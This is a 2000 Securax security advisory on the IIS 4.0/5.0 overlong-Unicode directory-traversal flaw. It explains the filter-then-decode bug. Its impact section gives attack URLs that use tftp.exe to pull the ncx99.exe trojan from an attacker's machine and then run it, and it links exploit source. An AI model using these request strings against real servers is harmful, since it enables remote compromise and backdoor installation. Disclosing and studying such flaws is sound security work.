
Title: Ms Windows IIS4.0 - 5.0 allows executing commands
Released by: Securax
Date: 24th October 2000
=====================================================================

Securax-SA-06 Security Advisory

belgian.networking.security Dutch

=====================================================================

Topic: Ms Windows IIS4.0 - 5.0 allows executing commands
and uploading files using TFTP and SAMBA.
Announced: 2000-10-23
Updated: 2000-10-24
Affects: IIS 4.0, 5.0
None affected: Apache, IIS 3.0
Obsoletes: /

=====================================================================

THE ENTIRE ADVISORY HAS BEEN BASED UPON TRIAL AND ERROR RESULTS.
THEREFORE WE CANNOT ASSURE YOU THE INFORMATION BELOW IS 100% CORRECT.
THIS DOCUMENT IS SUBJECT TO CHANGE WITHOUT PRIOR NOTICE.
PLEASE, IF YOU HAPPEN TO FIND MORE INFORMATION CONCERNING THE BUG
DISCUSSED IN THIS ADVISORY, PLEASE SHARE THIS ON BUGTRAQ.
THANK YOU,

I. Background

As mentioned in other advisories, remote users can execute any command on
several IIS 4.0 and 5.0 systems by using overlong Unicode representations
for ../

What are these overlong Unicode representations? Unicode v2.0 allows
multiple encoding possibilities for each character; for instance:

2f
c0 af
e0 80 af
f0 80 80 af
f8 80 80 80 af
fc 80 80 80 80 af

... are all some of the possible representations for "/". A good Unicode
decoder should disallow all representations with a hex value larger than
the smallest possible representation, to avoid problems with filtering.

This is where things go wrong in IIS 4.0 and 5.0. IIS first scans the
given URL for ../ and ..\ and for the normal Unicode encoding of these
strings; if those are found, the string is rejected, and if they are not
found, the string is decoded and interpreted. That IIS filters first and
decodes afterwards can be derived from the differences between error.log
and access.log when it comes to handling encoded URLs.

Since the filter does NOT check for the huge number of overlong Unicode
representations of ../ and ..\, the filter is bypassed and the directory
traversal routine is invoked. Until now, only servers that have the
/wwwroot/ dir on the same partition as the WINNT dir seem to be vulnerable.

(Although we noticed that for some reason, if an inactive /Inetpub/wwwroot/
exists on the c: drive, you will be able to run commands even if the
active wwwroot is on the d: drive.)

Exploiting this bug is quite easy, but using pipes (>|<) always causes a
500 server error. Without these characters we cannot use interactive
standard NT executables like ftp or telnet (or ftp.exe < script), and we
cannot create files with custom contents by using echo "blah blah" >
filename.

Thus we are limited to viewing, deleting and copying files, not changing
the contents of files or running our very own trojan.

II. Problem Description

Anonymous, remote (IUSR_xxxxx) users can view, copy, delete, md and issue
other non-ACL-protected commands from their browser windows. The
possibilities even include uploading trojans and other hostile code,
viewing .asp files, ...

III. Impact



By using tftp.exe, which comes with NT and Win2k, to connect to a tftp
daemon and download a trojan, you can bypass these restrictions. Install
< http://ftp.cavebear.com/karl/tftpd32.zip > and connect from the
compromised machine to your local machine using the command
" tftp.exe -i xxx.xxx.xxx.xxx GET ncx99.exe ".

You can do so with this URL:

/[bin-dir]/..%c0%af../winnt/system32/tftp.exe+"-i"+xxx.xxx.xxx.xxx+GET+ncx99.exe+c:\winnt\system32\ncx99.exe

Then all you have to do is run the trojan with:

/[bin-dir]/..%c0%af../winnt/system32/ncx99.exe

You might also use the Samba commands "net share" and "net user" on the
target and "net use" on the local machine... but this does not always
seem to work. (Because NetBIOS is not installed?)

IV. Solution

This *should* get patched asap, since a lot of servers seem to be
vulnerable. The possibilities of this exploit are bigger than meets the
eye, and we all had our share of warnings when the msadc exploded in our
faces. This vulnerability is serious, so patch this as soon as possible.

V. Credits

UNICODE decoding flaw posted to packetstorm forum by an unknown author.
 for the Samba tryout and writeup
 for the TFTP.

VI. Source code

http://www.unixandbeer.com/reggie/IIS4-5.exe
http://packetstorm.securify.com/0010-exploits/iisex.c

Recommended reading (unicode):

http://www.unicode.org/charts/PDF/
http://home.sch.bme.hu/~kisza/secure-programs/x401.html
http://www.cl.cam.ac.uk/~mgk25/unicode.html

(C) 1999-2000 All rights reserved.